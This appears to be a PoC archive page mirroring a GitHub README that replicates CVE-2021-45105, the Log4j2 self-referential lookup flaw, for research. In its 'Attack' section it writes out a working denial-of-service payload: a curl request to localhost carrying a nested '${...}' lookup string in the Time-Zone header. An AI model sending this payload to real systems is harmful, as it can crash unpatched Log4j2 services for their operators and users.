Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-45105 PoC — Apache Log4j2 does not always protect from infinite recursion in lookup evaluation

Source
https://github.com/tejas-nagchandi/CVE-2021-45105
Associated Vulnerability
Title:Apache Log4j2 does not always protect from infinite recursion in lookup evaluation (CVE-2021-45105)
Description:Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.
Description
Replicating CVE-2021-45105
Readme
# tejas-nagchandi/CVE-2021-45105
Replicating CVE-2021-45105

## API
```
curl -I localhost:8080/currentDateTime -H 'Time-Zone: GMT'
```
Output:

![image](https://user-images.githubusercontent.com/76960497/146695238-6723adf4-a46e-492e-af7e-1e56c76c3882.png)

## Attack
```
 curl -I localhost:8080/currentDateTime -H 'Time-Zone: ${${::-${::-$${::-$}}}}'
```
Output:

![image](https://user-images.githubusercontent.com/76960497/146695252-05a3b4aa-71f9-48f9-a8d0-757dc2e65bd0.png)

Logs:

![image](https://user-images.githubusercontent.com/76960497/146694904-173ade2d-3036-45ce-88fd-22d815de93c8.png)

## Reference:
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →